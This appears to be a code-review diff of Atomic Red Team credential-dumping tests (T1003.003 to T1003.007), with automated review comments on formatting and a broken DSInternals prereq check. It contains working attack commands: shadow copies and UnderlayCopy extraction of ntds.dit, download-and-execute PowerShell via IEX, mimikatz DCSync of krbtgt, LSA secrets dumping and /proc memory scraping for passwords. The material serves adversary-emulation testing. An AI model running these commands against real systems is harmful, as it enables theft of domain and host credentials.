## Atomic Test #9 - Create Volume Shadow Copy with diskshadow
This test is intended to be run on a domain controller
An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit
**Supported Platforms:** Windows
**auto_generated_guid:** `b385996c-0e7d-4e27-95a4-aca046b119a7`
#### Inputs
**auto_generated_guid:** b385996c-0e7d-4e27-95a4-aca046b119a7
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| filename | Location of the script | Path | PathToAtomicsFolder&#92;T1003.003&#92;src&#92;diskshadow.txt|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
mkdir c:\exfil
diskshadow.exe /s #(unknown)
```
### Atomic Test #10: Copy NTDS in low level NTFS acquisition via MFT parsing
This test is intended to be run on a domain Controller.
UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
**Supported Platforms:** Windows
**auto_generated_guid:** `f57cb283-c131-4e2f-8a6c-363d575748b2`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| extract_path | Path for extracted NTDS.dit | string | C:&#92;Windows&#92;Temp|
| script_url | URL to UnderlayCopy script | url | https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
```
#### Cleanup Commands
```powershell
remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
```
### Atomic Test #11: Copy NTDS in low level NTFS acquisition via fsutil
This test is intended to be run on a domain Controller.
UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
**Supported Platforms:** Windows
**auto_generated_guid:** `c7be89f7-5d06-4321-9f90-8676a77e0502`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| extract_path | Path for extracted NTDS.dit | string | C:&#92;Windows&#92;Temp|
| script_url | URL to UnderlayCopy script | url | https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
```
#### Cleanup Commands
```powershell
remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
```
<br/>
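Review bot: in Atomic Test #9 the command reads `diskshadow.exe /s #(unknown)` even though the Inputs table declares a `filename` argument, so the generated command never interpolates `#{filename}`; check the executor for that test in the YAML (the same `#(unknown)` appears in the context line of the YAML hunk below) and restore the input reference. Separately, Atomic Test #7 describes `drive_letter` as "including colon" but defaults to `C:\`, while tests #4 and #5 describe the same default as "including colon and backslash"; align the description so anyone overriding the input passes the same form the default uses.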
-57
View File
@@ -261,60 +261,3 @@ atomic_tests:
diskshadow.exe /s #(unknown)
name: command_prompt
elevation_required: true
- name: Copy NTDS in low level NTFS acquisition via MFT parsing
auto_generated_guid: f57cb283-c131-4e2f-8a6c-363d575748b2
description: |
This test is intended to be run on a domain Controller.
UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
supported_platforms:
- windows
input_arguments:
extract_path:
type: string
default: C:\Windows\Temp
description: Path for extracted NTDS.dit
script_url:
description: URL to UnderlayCopy script
type: url
default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode MFT -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode MFT -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
name: powershell
elevation_required: true
cleanup_command: |
remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
- name: Copy NTDS in low level NTFS acquisition via fsutil
auto_generated_guid: c7be89f7-5d06-4321-9f90-8676a77e0502
description: |
This test is intended to be run on a domain Controller.
UnderlayCopy is a PowerShell utility for low-level NTFS acquisition and dumping protected, locked system artifacts (for example: SAM, SYSTEM, NTDS.dit, registry hives, and other files that are normally inaccessible while Windows is running).
supported_platforms:
- windows
input_arguments:
extract_path:
type: string
default: C:\Windows\Temp
description: Path for extracted NTDS.dit
script_url:
description: URL to UnderlayCopy script
type: url
default: https://raw.githubusercontent.com/kfallahi/UnderlayCopy/37f2e9b76b724bc1211437b14deaf1e76b21791e/UnderlayCopy.ps1
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR #{script_url} -UseBasicParsing)
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\NTDS\ntds.dit -DestinationFile #{extract_path}\ntds.dit
Underlay-Copy -Mode Metadata -SourceFile C:\Windows\System32\config\SYSTEM -DestinationFile #{extract_path}\SYSTEM_HIVE
name: powershell
elevation_required: true
cleanup_command: |
remove-item "#{extract_path}\ntds.dit" -force -erroraction silentlycontinue
remove-item "#{extract_path}\SYSTEM_HIVE" -force -erroraction silentlycontinue
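Review bot: this hunk deletes 57 lines, the two UnderlayCopy tests (`f57cb283-c131-4e2f-8a6c-363d575748b2` and `c7be89f7-5d06-4321-9f90-8676a77e0502`), from the YAML, which is a content change unrelated to a generator conversion; either confirm in the commit message that these tests are intentionally being dropped or move the removal into its own commit so the conversion diff stays reviewable as a no-op regeneration of the markdown.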
+46 -23
View File
@@ -1,20 +1,23 @@
# T1003.004 - OS Credential Dumping: LSA Secrets
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/004)
<blockquote>
## Description from ATT&CK
Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
> Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
>
> [Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)
[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)
[Source](https://attack.mitre.org/techniques/T1003/004)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Dumping LSA Secrets](#atomic-test-1-dumping-lsa-secrets)
- [Atomic Test #2: Dump Kerberos Tickets from LSA using dumper.ps1](#atomic-test-2-dump-kerberos-tickets-from-lsa-using-dumperps1)
- [Atomic Test #1 - Dumping LSA Secrets](#atomic-test-1---dumping-lsa-secrets)
### Atomic Test #1: Dumping LSA Secrets
- [Atomic Test #2 - Dump Kerberos Tickets from LSA using dumper.ps1](#atomic-test-2---dump-kerberos-tickets-from-lsa-using-dumperps1)
<br/>
## Atomic Test #1 - Dumping LSA Secrets
Dump secrets key from Windows registry
When successful, the dumped file will be written to $env:Temp\secrets.
Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information.
@@ -22,38 +25,40 @@ https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%2
**Supported Platforms:** Windows
**auto_generated_guid:** `55295ab0-a703-433b-9ca4-ae13807de12f`
#### Inputs
**auto_generated_guid:** 55295ab0-a703-433b-9ca4-ae13807de12f
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| psexec_exe | Path to PsExec executable | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;T1003.004&#92;bin&#92;PsExec.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
"#{psexec_exe}" -accepteula -s reg save HKLM\security\policy\secrets %temp%\secrets /y
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
del %temp%\secrets >nul 2> nul
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: PsExec from Sysinternals must exist on disk at specified location (#{psexec_exe})
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "#{psexec_exe}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PSTools.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PSTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\PSTools" -Force
@@ -61,8 +66,13 @@ New-Item -ItemType Directory (Split-Path "#{psexec_exe}") -Force | Out-Null
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PSTools\PsExec.exe" "#{psexec_exe}" -Force
```
### Atomic Test #2: Dump Kerberos Tickets from LSA using dumper.ps1
<br/>
<br/>
## Atomic Test #2 - Dump Kerberos Tickets from LSA using dumper.ps1
This tool allows you to dump Kerberos tickets from the LSA cache. Implemented via Add-Type.
If the tool is run as a privileged user, it will automatically obtain NT AUTHORITY\SYSTEM privileges and then dump all tickets. If the tool is run as a non-privileged user, it will only dump tickets from the current logon session.
Ref: https://github.com/MzHmO/PowershellKerberos/
@@ -70,11 +80,24 @@ Author of dumper.ps1: Michael Zhmaylo (@MzHmO)
**Supported Platforms:** Windows
**auto_generated_guid:** `2dfa3bff-9a27-46db-ab75-7faefdaca732`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 2dfa3bff-9a27-46db-ab75-7faefdaca732
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/MzHmO/PowershellKerberos/beed52acda37fc531ef0cb4df3fc2eb63a74bbb8/dumper.ps1')
```
<br/>
+30 -15
View File
@@ -1,25 +1,27 @@
# T1003.005 - OS Credential Dumping: Cached Domain Credentials
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/005)
<blockquote>
## Description from ATT&CK
Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)
> Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)
>
> On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)
>
> On Linux systems, Active Directory credentials can be accessed through caches maintained by software like System Security Services Daemon (SSSD) or Quest Authentication Services (formerly VAS). Cached credential hashes are typically located at `/var/lib/sss/db/cache.[domain].ldb` for SSSD or `/var/opt/quest/vas/authcache/vas_auth.vdb` for Quest. Adversaries can use utilities, such as `tdbdump`, on these database files to dump the cached hashes and use [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to obtain the plaintext password.(Citation: Brining MimiKatz to Unix)
>
> With SYSTEM or sudo access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py for Windows or Linikatz for Linux can be used to extract the cached credentials.(Citation: Brining MimiKatz to Unix)
>
> Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)
On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)
[Source](https://attack.mitre.org/techniques/T1003/005)
On Linux systems, Active Directory credentials can be accessed through caches maintained by software like System Security Services Daemon (SSSD) or Quest Authentication Services (formerly VAS). Cached credential hashes are typically located at `/var/lib/sss/db/cache.[domain].ldb` for SSSD or `/var/opt/quest/vas/authcache/vas_auth.vdb` for Quest. Adversaries can use utilities, such as `tdbdump`, on these database files to dump the cached hashes and use [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to obtain the plaintext password.(Citation: Brining MimiKatz to Unix)
With SYSTEM or sudo access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py for Windows or Linikatz for Linux can be used to extract the cached credentials.(Citation: Brining MimiKatz to Unix)
Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Cached Credential Dump via Cmdkey](#atomic-test-1-cached-credential-dump-via-cmdkey)
- [Atomic Test #1 - Cached Credential Dump via Cmdkey](#atomic-test-1---cached-credential-dump-via-cmdkey)
### Atomic Test #1: Cached Credential Dump via Cmdkey
<br/>
## Atomic Test #1 - Cached Credential Dump via Cmdkey
List credentials currently stored on the host via the built-in Windows utility cmdkey.exe
Credentials listed with Cmdkey only pertain to the current user
Passwords will not be displayed once they are stored
@@ -28,11 +30,24 @@ https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-
**Supported Platforms:** Windows
**auto_generated_guid:** `56506854-89d6-46a3-9804-b7fde90791f9`
#### Attack Commands: Run with `command_prompt`!
**auto_generated_guid:** 56506854-89d6-46a3-9804-b7fde90791f9
#### Attack Commands: Run with `command_prompt`!
```cmd
cmdkey /list
```
<br/>
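Review bot: the removed and added `#### Attack Commands: Run with `command_prompt`!` lines in this hunk read identically, so the only difference between them is trailing whitespace or a line-ending, and the same invisible churn will recur on every regeneration; strip trailing whitespace in the template (or normalize it in the comparison the generator tests use) so a regenerated file only diffs where content changed. The one visible change here is the `auto_generated_guid` rendered as `` `56506854-89d6-46a3-9804-b7fde90791f9` `` on one side and bare `56506854-89d6-46a3-9804-b7fde90791f9` on the other; pick one rendering and state it in the commit message, since downstream tooling that scrapes the guid from the markdown will see the change.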
+51 -32
View File
@@ -1,22 +1,25 @@
# T1003.006 - OS Credential Dumping: DCSync
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/006)
<blockquote>
## Description from ATT&CK
Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
> Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
>
> Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)
>
> DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)
Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)
[Source](https://attack.mitre.org/techniques/T1003/006)
DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)
</blockquote>
## Atomic Tests
- [Atomic Test #1: DCSync (Active Directory)](#atomic-test-1-dcsync-active-directory)
- [Atomic Test #2: Run DSInternals Get-ADReplAccount](#atomic-test-2-run-dsinternals-get-adreplaccount)
- [Atomic Test #1 - DCSync (Active Directory)](#atomic-test-1---dcsync-active-directory)
### Atomic Test #1: DCSync (Active Directory)
- [Atomic Test #2 - Run DSInternals Get-ADReplAccount](#atomic-test-2---run-dsinternals-get-adreplaccount)
<br/>
## Atomic Test #1 - DCSync (Active Directory)
Active Directory attack allowing retrieval of account information without accessing memory or retrieving the NTDS database.
Works against a remote Windows Domain Controller using the replication protocol.
Privileges required: domain admin or domain controller account (by default), or any other account with required rights.
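Review bot: this hunk changes the document layout, not just the generator language, and the commit message ("python conversion") does not say which layout is the intended output: `## Description from ATT&CK` with a `>` blockquote and a trailing `[Source](https://attack.mitre.org/techniques/T1003/006)` line on one side, `## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/006)` wrapping a `<blockquote>` on the other, and the test headings switching between `### Atomic Test #1: DCSync (Active Directory)` and `## Atomic Test #1 - DCSync (Active Directory)` with the TOC slugs changing to match (`#atomic-test-1-dcsync-active-directory` vs `#atomic-test-1---dcsync-active-directory`). Both slug forms are what GitHub derives from their respective headings (lowercase, spaces to hyphens, punctuation other than hyphens dropped), so please add a generator test that computes the slug from the heading text rather than formatting it separately, and document the chosen layout so the next regeneration does not flip it back.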
@@ -24,36 +27,39 @@ Privileges required: domain admin or domain controller account (by default), or
**Supported Platforms:** Windows
**auto_generated_guid:** `129efd28-8497-4c87-a1b0-73b9a870ca3e`
#### Inputs
**auto_generated_guid:** 129efd28-8497-4c87-a1b0-73b9a870ca3e
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Targeted Active Directory domain | string | %userdnsdomain%|
| user | Targeted user | string | krbtgt|
| mimikatz_path | Mimikatz windows executable | path | %tmp%&#92;mimikatz&#92;x64&#92;mimikatz.exe|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit"
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
@@ -64,8 +70,13 @@ $basePath = Split-Path $mimikatz_exe | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
```
### Atomic Test #2: Run DSInternals Get-ADReplAccount
<br/>
<br/>
## Atomic Test #2 - Run DSInternals Get-ADReplAccount
The following Atomic will run Get-ADReplAccount from DSInternals.
Upon successful execution, domain and credentials will appear in stdout.
[Reference](https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/) CrowdStrike StellarParticle.
@@ -73,35 +84,43 @@ https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/
**Supported Platforms:** Windows
**auto_generated_guid:** `a0bced08-3fc5-4d8b-93b7-e8344739376e`
#### Inputs
**auto_generated_guid:** a0bced08-3fc5-4d8b-93b7-e8344739376e
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| logonserver | ComputerName argument default %logonserver% | string | $ENV:logonserver.TrimStart("&#92;")|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
Get-ADReplAccount -All -Server #{logonserver}
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: DSInternals must be installed
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
$RequiredModule = Get-Module -Name DSInternals -ListAvailable
if (-not $RequiredModule) {exit 1} else {exit 0}
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
Install-Module -Name DSInternals -Scope CurrentUser -Force
```
<br/>
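Review bot: the two-line DSInternals prereq check in this hunk, `if (-not $RequiredModule) {exit 1}` followed by `if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}`, cannot succeed: `ExportedCommands` is keyed by cmdlet name (`Get-ADReplAccount`, the cmdlet this test actually runs), not by module name, so the lookup returns `$null` and the check exits 1 on every host, which makes the get-prereq step reinstall the module on every run and still fail. It also breaks when more than one version is installed, because `Get-Module -ListAvailable` then returns an array. This markdown is generated from `T1003.006.yaml`, so the fix belongs there; either keep the single-line `if (-not $RequiredModule) {exit 1} else {exit 0}` or test for the cmdlet the executor needs with `if (Get-Command -Name Get-ADReplAccount -Module DSInternals -ErrorAction SilentlyContinue) {exit 0} else {exit 1}`.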
+2 -1
View File
@@ -64,7 +64,8 @@ atomic_tests:
DSInternals must be installed
prereq_command: |
$RequiredModule = Get-Module -Name DSInternals -ListAvailable
if (-not $RequiredModule) {exit 1} else {exit 0}
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}
get_prereq_command: |
Install-Module -Name DSInternals -Scope CurrentUser -Force
executor:
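Review bot: the added line `if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}` uses the wrong key, since a module's `ExportedCommands` dictionary is indexed by command name (`Get-ADReplAccount`, `Get-ADDBAccount`, and so on) and DSInternals exports no command named `DSInternals`; the indexer returns `$null`, the check always exits 1, and the get-prereq `Install-Module` runs on every invocation without ever satisfying it. The single line it replaces, `if (-not $RequiredModule) {exit 1} else {exit 0}`, was correct; if the intent is to verify the cmdlet rather than the module, use `if (Get-Command -Name Get-ADReplAccount -Module DSInternals -ErrorAction SilentlyContinue) {exit 0} else {exit 1}`, which also behaves when several versions of the module are installed.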
+103 -91
View File
@@ -1,40 +1,51 @@
# T1003.007 - OS Credential Dumping: Proc Filesystem
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/007)
<blockquote>
## Description from ATT&CK
Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the processs virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the processs virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
> Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the processs virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the processs virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
>
> When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns indicative of credentials. Adversaries may use regex patterns, such as <code>grep -E "^[0-9a-f-]* r" /proc/"$pid"/maps | cut -d' ' -f 1</code>, to look for fixed strings in memory structures or cached hashes.(Citation: atomic-red proc file system) When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the processs memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook)
>
> If running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.
When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns indicative of credentials. Adversaries may use regex patterns, such as <code>grep -E "^[0-9a-f-]* r" /proc/"$pid"/maps | cut -d' ' -f 1</code>, to look for fixed strings in memory structures or cached hashes.(Citation: atomic-red proc file system) When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the processs memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook)
[Source](https://attack.mitre.org/techniques/T1003/007)
If running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.
</blockquote>
## Atomic Tests
- [Atomic Test #1: Dump individual process memory with sh (Local)](#atomic-test-1-dump-individual-process-memory-with-sh-local)
- [Atomic Test #2: Dump individual process memory with sh on FreeBSD (Local)](#atomic-test-2-dump-individual-process-memory-with-sh-on-freebsd-local)
- [Atomic Test #3: Dump individual process memory with Python (Local)](#atomic-test-3-dump-individual-process-memory-with-python-local)
- [Atomic Test #4: Capture Passwords with MimiPenguin](#atomic-test-4-capture-passwords-with-mimipenguin)
- [Atomic Test #1 - Dump individual process memory with sh (Local)](#atomic-test-1---dump-individual-process-memory-with-sh-local)
### Atomic Test #1: Dump individual process memory with sh (Local)
- [Atomic Test #2 - Dump individual process memory with sh on FreeBSD (Local)](#atomic-test-2---dump-individual-process-memory-with-sh-on-freebsd-local)
- [Atomic Test #3 - Dump individual process memory with Python (Local)](#atomic-test-3---dump-individual-process-memory-with-python-local)
- [Atomic Test #4 - Capture Passwords with MimiPenguin](#atomic-test-4---capture-passwords-with-mimipenguin)
<br/>
## Atomic Test #1 - Dump individual process memory with sh (Local)
Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
copy process memory to an external file so it can be searched or exfiltrated later.
**Supported Platforms:** Linux
**auto_generated_guid:** `7e91138a-8e74-456d-a007-973d67a0bb80`
#### Inputs
**auto_generated_guid:** 7e91138a-8e74-456d-a007-973d67a0bb80
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | path | /tmp/T1003.007.bin|
| script_path | Path to script generating the target process | path | /tmp/T1003.007.sh|
| pid_term | Unique string to use to identify target process | string | T1003.007|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sh #{script_path}
@@ -47,49 +58,56 @@ dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM
grep -i "PASS" "#{output_file}"
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm -f "#{output_file}"
```
#### Dependencies: Run with `sh`!
#### Dependencies: Run with `sh`!
##### Description: Script to launch target process must exist
###### Check Prereq Commands
##### Check Prereq Commands:
```sh
test -f #{script_path}
grep "#{pid_term}" #{script_path}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```sh
echo '#!/bin/sh' > #{script_path}
echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
```
### Atomic Test #2: Dump individual process memory with sh on FreeBSD (Local)
<br/>
<br/>
## Atomic Test #2 - Dump individual process memory with sh on FreeBSD (Local)
Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
copy process memory to an external file so it can be searched or exfiltrated later.
On FreeBSD procfs must be mounted.
**Supported Platforms:** Linux
**auto_generated_guid:** `fa37b633-e097-4415-b2b8-c5bf4c86e423`
#### Inputs
